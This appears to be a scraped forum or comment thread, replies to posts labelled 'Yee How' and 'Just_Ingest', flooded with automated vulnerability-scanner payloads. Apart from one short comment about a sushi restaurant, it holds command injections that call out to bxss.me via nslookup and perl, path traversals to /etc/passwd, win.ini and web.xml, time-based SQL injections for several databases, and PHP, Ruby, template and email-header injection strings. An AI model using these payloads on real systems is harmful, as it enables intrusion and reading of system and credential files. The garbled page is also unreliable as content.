&(nslookup hitudknimmsex57ec4.bxss.me||perl -e "gethostbyname('hitudknimmsex57ec4.bxss.me')")&'\"`0&(nslookup hitudknimmsex57ec4.bxss.me||perl -e "gethostbyname('hitudknimmsex57ec4.bxss.me')")&`'
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
|(nslookup hituxjmkgvhlr043e2.bxss.me||perl -e "gethostbyname('hituxjmkgvhlr043e2.bxss.me')")
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
`(nslookup hitgetdftzsbe9fe55.bxss.me||perl -e "gethostbyname('hitgetdftzsbe9fe55.bxss.me')")`
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
'.gethostbyname(lc('hitlg'.'rhnojcmw228b0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(87).chr(117).chr(83).'
re: Yee How
;(nslookup hitgakfzhlwcyc201b.bxss.me||perl -e "gethostbyname('hitgakfzhlwcyc201b.bxss.me')")|(nslookup hitgakfzhlwcyc201b.bxss.me||perl -e "gethostbyname('hitgakfzhlwcyc201b.bxss.me')")&(nslookup hitgakfzhlwcyc201b.bxss.me||perl -e "gethostbyname('hitgakfzhlwcyc201b.bxss.me')")
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
".gethostbyname(lc("hitfb"."chtkfjggaaee2.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(80).chr(110).chr(81)."
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
file:///etc/passwd
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
/WEB-INF/web.xml
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
/etc/shells
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(101).concat(79).concat(118).concat(85)+(require"socket"
Socket.gethostbyname("hitbu"+"qisictoh44832.bxss.me.")[3].to_s)+"
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
c:/windows/win.ini
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(108).concat(67).concat(117).concat(70)+(require'socket'
Socket.gethostbyname('hitjr'+'htzixulbd053b.bxss.me.')[3].to_s)+'
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
bxss.me
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
';print(md5(31337));$a='
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
'"
re: Yee How
";print(md5(31337));$a="
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
<!--
re: Yee How
${@print(md5(31337))}
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
${@print(md5(31337))}\
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
'.print(md5(31337)).'
re: Yee How
WEB-INF/web.xml
re: Yee How
WEB-INF\web.xml
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+331-331-1=0+0+0+1 --
re: Yee How
-1 OR 3+331-331-1=0+0+0+1 --
re: Yee How
-1 OR 2+388-388-1=0+0+0+1
re: Yee How
-1 OR 3+388-388-1=0+0+0+1
re: Yee How
-1' OR 2+525-525-1=0+0+0+1 --
re: Yee How
-1' OR 3+525-525-1=0+0+0+1 --
re: Yee How
-1' OR 2+51-51-1=0+0+0+1 or 'FUWJHgpq'='
re: Yee How
-1' OR 3+51-51-1=0+0+0+1 or 'FUWJHgpq'='
re: Yee How
-1" OR 2+266-266-1=0+0+0+1 --
re: Yee How
-1" OR 3+266-266-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
JTgkvQnZ'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 658=(SELECT 658 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 195=(SELECT 195 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: Yee How
q3PupbKJ' OR 724=(SELECT 724 FROM PG_SLEEP(15))--
re: Yee How
s2jOimcm') OR 12=(SELECT 12 FROM PG_SLEEP(15))--
re: Yee How
mZYBnbP4')) OR 206=(SELECT 206 FROM PG_SLEEP(15))--
re: Yee How
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@2nTiV
Apparently the owner is someone who had no formal master in sushi and worked in a bar before? (https://www.youtube.com/watch?v=VrK5nxFjNIQ) The form of the nigiri looks very good, though, so I'd be very interested in reviews of this place! (However, I've also heard that you may need a Japanese speaker to take you there..)
re: Just_Ingest
K9KDis52
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+115-115-1=0+0+0+1
re: Just_Ingest
-1 OR 3+115-115-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
gjJOqm3r
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+262-262-1=0+0+0+1
re: Just_Ingest
-1 OR 3+262-262-1=0+0+0+1
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
GOU0EnXZ'; waitfor delay '0:0:15' --
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))--
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-5) OR 407=(SELECT 407 FROM PG_SLEEP(15))--
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
-1)) OR 55=(SELECT 55 FROM PG_SLEEP(15))--
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
5JcGaTlT' OR 249=(SELECT 249 FROM PG_SLEEP(15))--
re: Just_Ingest
mD8af88J'; waitfor delay '0:0:15' --
re: Just_Ingest
3osfkqXA') OR 744=(SELECT 744 FROM PG_SLEEP(15))--
re: Just_Ingest
-5 OR 80=(SELECT 80 FROM PG_SLEEP(15))--
re: Just_Ingest
KAYG34Te')) OR 14=(SELECT 14 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 993=(SELECT 993 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
-1)) OR 802=(SELECT 802 FROM PG_SLEEP(15))--
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
zSQgUd6a' OR 539=(SELECT 539 FROM PG_SLEEP(15))--
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
dlTCtKs4') OR 629=(SELECT 629 FROM PG_SLEEP(15))--
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@P340w
re: Just_Ingest
NiyL76Ii')) OR 100=(SELECT 100 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@tk84d
re: Just_Ingest
1mbYdKrAO
re: Just_Ingest
response.write(9282126*9344513)
re: Just_Ingest
'+response.write(9282126*9344513)+'
re: Just_Ingest
"+response.write(9282126*9344513)+"
re: Just_Ingest
%0abcc:074625.67-16777.67.1e2c1.19990.2@bxss.me
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-16778.67.1e2c1.19990.2@bxss.me
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
${9999938+9999707}
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
)
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
echo hbygps$()\ txdsbr\nz^xyu||a #' &echo hbygps$()\ txdsbr\nz^xyu||a #|" &echo hbygps$()\ txdsbr\nz^xyu||a #
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
/etc/passwd
re: Just_Ingest
&echo ceoqni$()\ qnmssx\nz^xyu||a #' &echo ceoqni$()\ qnmssx\nz^xyu||a #|" &echo ceoqni$()\ qnmssx\nz^xyu||a #
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
|echo svckkf$()\ mcivhs\nz^xyu||a #' |echo svckkf$()\ mcivhs\nz^xyu||a #|" |echo svckkf$()\ mcivhs\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
(nslookup hitjfjlslmllqd7d53.bxss.me||perl -e "gethostbyname('hitjfjlslmllqd7d53.bxss.me')")
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
$(nslookup hitupbdqcoggg7c133.bxss.me||perl -e "gethostbyname('hitupbdqcoggg7c133.bxss.me')")
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
&nslookup hitlqlduqiirhda07d.bxss.me&'\"`0&nslookup hitlqlduqiirhda07d.bxss.me&`'
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
&(nslookup hitiufvlneabu4242f.bxss.me||perl -e "gethostbyname('hitiufvlneabu4242f.bxss.me')")&'\"`0&(nslookup hitiufvlneabu4242f.bxss.me||perl -e "gethostbyname('hitiufvlneabu4242f.bxss.me')")&`'
re: Just_Ingest
'.gethostbyname(lc('hityy'.'hblsgaboa3da6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(79).chr(99).chr(72).'
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
|(nslookup hitpmmkwukevn471c7.bxss.me||perl -e "gethostbyname('hitpmmkwukevn471c7.bxss.me')")
re: Just_Ingest
".gethostbyname(lc("hitsb"."xdyghpbjd1e4c.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(67).chr(115).chr(75)."
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
`(nslookup hithezrcgnjxw856c8.bxss.me||perl -e "gethostbyname('hithezrcgnjxw856c8.bxss.me')")`
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
;(nslookup hitabnhdkvftj826b3.bxss.me||perl -e "gethostbyname('hitabnhdkvftj826b3.bxss.me')")|(nslookup hitabnhdkvftj826b3.bxss.me||perl -e "gethostbyname('hitabnhdkvftj826b3.bxss.me')")&(nslookup hitabnhdkvftj826b3.bxss.me||perl -e "gethostbyname('hitabnhdkvftj826b3.bxss.me')")
re: Just_Ingest
/etc/shells
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
bxss.me
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(103).concat(90).concat(99).concat(71)+(require"socket"
Socket.gethostbyname("hitxz"+"ncklswuud7c64.bxss.me.")[3].to_s)+"
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(108).concat(73).concat(98).concat(66)+(require'socket'
Socket.gethostbyname('hitnr'+'wqsxydokba229.bxss.me.')[3].to_s)+'
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
'"
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
